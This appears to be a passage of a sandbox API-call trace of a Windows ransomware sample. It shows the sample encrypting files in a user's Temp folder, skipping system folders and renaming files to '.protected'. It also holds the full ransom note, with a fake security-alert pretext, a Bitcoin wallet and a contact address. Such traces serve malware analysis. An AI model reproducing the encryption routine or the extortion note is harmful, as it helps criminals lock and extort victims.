1 [0086.820] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0086.821] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 
1 [0086.821] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.821] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.821] CloseHandle (hObject=0x150) returned 1 [0086.822] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.protected") returned 92 [0086.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat.protected")) returned 1 [0086.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.823] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.823] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\RESTORE_FILES.txt") returned 90 [0086.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x14c [0086.825] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.825] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.825] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.825] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.826] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.826] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.826] CloseHandle (hObject=0x14c) returned 1 [0086.827] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.827] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.827] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RESTORE_FILES.txt") returned 78 [0086.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.827] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.827] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.828] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.828] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.828] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.828] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.828] CloseHandle (hObject=0xd8) returned 1 [0086.829] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Windows") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Program Files") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="Program Files (x86)") returned -1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="$Recycle.bin") returned 1 [0086.829] lstrcmpiW (lpString1="HK0R80bH0DLkf.odt", lpString2="System Volume Information") returned -1 [0086.829] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.829] StrStrIW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".protected") returned 0x0 [0086.829] lstrcmpW (lpString1="HK0R80bH0DLkf.odt", lpString2="RESTORE_FILES.txt") returned -1 [0086.829] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.829] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".txt") returned 0x0 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".rar") returned 0x0 [0086.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt") returned 70 [0086.830] StrStrW (lpFirst="HK0R80bH0DLkf.odt", lpSrch=".zip") returned 0x0 [0086.830] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.831] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.831] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.831] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.832] CloseHandle (hObject=0xd8) returned 1 [0086.832] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt.protected") returned 80 [0086.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\HK0R80bH0DLkf.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\hk0r80bh0dlkf.odt.protected")) returned 1 [0086.833] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Windows") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Program Files") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="Program Files (x86)") returned -1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="$Recycle.bin") returned 1 [0086.833] lstrcmpiW (lpString1="kKaSaw.wav", lpString2="System Volume Information") returned -1 [0086.833] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.833] StrStrIW (lpFirst="kKaSaw.wav", lpSrch=".protected") returned 0x0 [0086.834] lstrcmpW (lpString1="kKaSaw.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.834] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) 
returned 1 [0086.834] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".txt") returned 0x0 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".rar") returned 0x0 [0086.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav") returned 63 [0086.834] StrStrW (lpFirst="kKaSaw.wav", lpSrch=".zip") returned 0x0 [0086.834] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.835] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.835] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.836] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.836] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.836] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.836] CloseHandle (hObject=0xd8) returned 1 [0086.837] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav.protected") returned 73 [0086.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\kKaSaw.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kkasaw.wav.protected")) returned 1 [0086.838] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Windows") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Program Files") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="Program Files (x86)") returned -1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="$Recycle.bin") returned 1 [0086.838] lstrcmpiW (lpString1="KVahML13uO-CFVabiO9D.xlsx", lpString2="System Volume Information") returned -1 [0086.838] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.838] StrStrIW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".protected") returned 0x0 [0086.838] lstrcmpW (lpString1="KVahML13uO-CFVabiO9D.xlsx", 
lpString2="RESTORE_FILES.txt") returned -1 [0086.838] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.838] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".txt") returned 0x0 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".rar") returned 0x0 [0086.839] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx") returned 78 [0086.839] StrStrW (lpFirst="KVahML13uO-CFVabiO9D.xlsx", lpSrch=".zip") returned 0x0 [0086.839] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.840] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.840] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, 
lpOverlapped=0x0) returned 1 [0086.841] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.841] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.841] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.841] CloseHandle (hObject=0xd8) returned 1 [0086.842] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx.protected") returned 88 [0086.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\KVahML13uO-CFVabiO9D.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\kvahml13uo-cfvabio9d.xlsx.protected")) returned 1 [0086.843] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Windows") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Program Files") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="Program Files (x86)") returned -1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="$Recycle.bin") returned 1 [0086.844] lstrcmpiW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="System Volume Information") returned -1 [0086.844] wnsprintfW (in: pszDest=0x4695e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.844] StrStrIW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".protected") returned 0x0 [0086.844] lstrcmpW (lpString1="LjdEIZIp4ZLwh.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0086.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ljdeizip4zlwh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.844] StrStrW (lpFirst="LjdEIZIp4ZLwh.bmp", lpSrch=".txt") returned 0x0 [0086.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\LjdEIZIp4ZLwh.bmp") returned 70 [0086.845] 